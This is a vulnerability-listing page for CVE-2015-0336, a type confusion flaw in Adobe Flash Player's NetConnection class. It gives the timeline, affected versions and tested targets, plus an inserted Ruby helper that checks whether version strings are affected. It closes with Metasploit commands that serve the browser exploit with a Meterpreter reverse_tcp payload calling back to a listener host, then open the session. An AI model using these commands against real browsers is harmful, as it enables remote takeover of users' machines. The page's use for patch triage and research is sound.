CVE-2015-0336 Adobe Flash Player NetConnection Type Confusion

Timeline :

Vulnerability discovered and reported to the vendor by Natalie Silvanovich in January 2015
Patch provided by the vendor via APSB15-05 on 2015-03-12
Vulnerability found exploited in the wild by exploit kits on 2015-03-19
Details of the vulnerability provided by Google Security on 2015-04-13
Metasploit PoC provided on 2015-05-28

PoC provided by :

Natalie Silvanovich
Unknown
juan vazquez

Reference(s) :

CVE-2015-0336
APSB15-05

Affected version(s) :

Adobe Flash Player 16.0.0.305 and earlier versions (Windows and Macintosh)
Adobe Flash Player 13.0.0.269 and earlier 13.x versions (Windows and Macintosh)
Adobe Flash Player 11.2.202.442 and earlier 11.x versions (Linux)
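A quick triage helper, added here as an example (not code from the original page or from the Metasploit module): it takes a Flash Player version string as reported by the plugin ("WIN 16,0,0,305") or as listed in an inventory ("16.0.0.305") and tells whether the build is inside an affected range. The ceilings are those published in APSB15-05: 16.0.0.305 for the main line, 13.0.0.269 for the 13.x line and 11.2.202.442 for the 11.2.202.x (Linux) line. The function names and the sample inputs are constructed for this example.

```ruby
# Added example, not part of the original page or of the Metasploit module.
# Classify a Flash Player build against the affected ranges of
# APSB15-05 / CVE-2015-0336.

# Highest vulnerable build per release line, keyed on the first three
# version components. Lines not listed fall under the bulletin's generic
# "16.0.0.305 and earlier versions".
APSB15_05_CEILINGS = {
  [13, 0, 0]   => [13, 0, 0, 269],   # 13.x line
  [11, 2, 202] => [11, 2, 202, 442], # 11.2.202.x line (Linux)
}.freeze
DEFAULT_CEILING = [16, 0, 0, 305].freeze

# Flash reports its version either as "16.0.0.305" or, from the plugin's
# Capabilities.version, as "WIN 16,0,0,305" / "LNX 11,2,202,442".
# Returns an array of four integers, or nil if the string is not a version.
def parse_flash_version(str)
  s = str.to_s.strip.sub(/\A[A-Z]+\s+/, '') # drop a leading platform tag
  parts = s.split(/[.,]/)
  return nil unless parts.size == 4 && parts.all? { |p| p.match?(/\A\d+\z/) }
  parts.map(&:to_i)
end

# Ceiling that applies to this build's release line.
def apsb15_05_ceiling(version)
  APSB15_05_CEILINGS[version[0, 3]] || DEFAULT_CEILING
end

# :affected if the build is at or below its line's ceiling,
# :not_affected if above it, :unknown if the input could not be parsed.
def cve_2015_0336_status(str)
  v = parse_flash_version(str)
  return :unknown if v.nil?
  (v <=> apsb15_05_ceiling(v)) <= 0 ? :affected : :not_affected
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs, as an inventory script would see them.
  ['WIN 16,0,0,305', '17.0.0.134', 'LNX 11,2,202,442', '11.2.202.451',
   '13.0.0.269', '13.0.0.277', '11.5.502.146', 'not-a-version'].each do |s|
    puts "#{s.ljust(18)} #{cve_2015_0336_status(s)}"
  end
end
```

Component-wise comparison is used instead of string comparison so that "11.2.202.442" sorts below "11.2.202.451" and an older main-line build such as 11.5.502.146 (which is simply below 16.0.0.305) is still flagged.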

Tested on :

Windows 7 SP1 with IE 8 and Flash 16.0.0.305

Description :

This module exploits a type confusion vulnerability in the NetConnection class of Adobe Flash Player. Given a suitable heap layout, the confusion yields an arbitrary memory write, which is used to corrupt sensitive objects such as the length field of a Vector and ultimately gain remote code execution. This module has been tested successfully on:

* Windows 7 SP1 (32-bit), IE 8, IE 11 and Adobe Flash 16.0.0.305.
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Linux Mint "Rebecca" (32-bit), Firefox 33.0 and Adobe Flash 11.2.202.424.
* Ubuntu 14.04.2 LTS, Firefox 33.0 and Adobe Flash 11.2.202.442.

Commands :

use exploit/multi/browser/adobe_flash_net_connection_confusion
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit -j

Once a target browser has loaded the served page and a Meterpreter session has opened, interact with it (session 1 is assumed here) and check the user the payload runs as:

sessions -i 1
getuid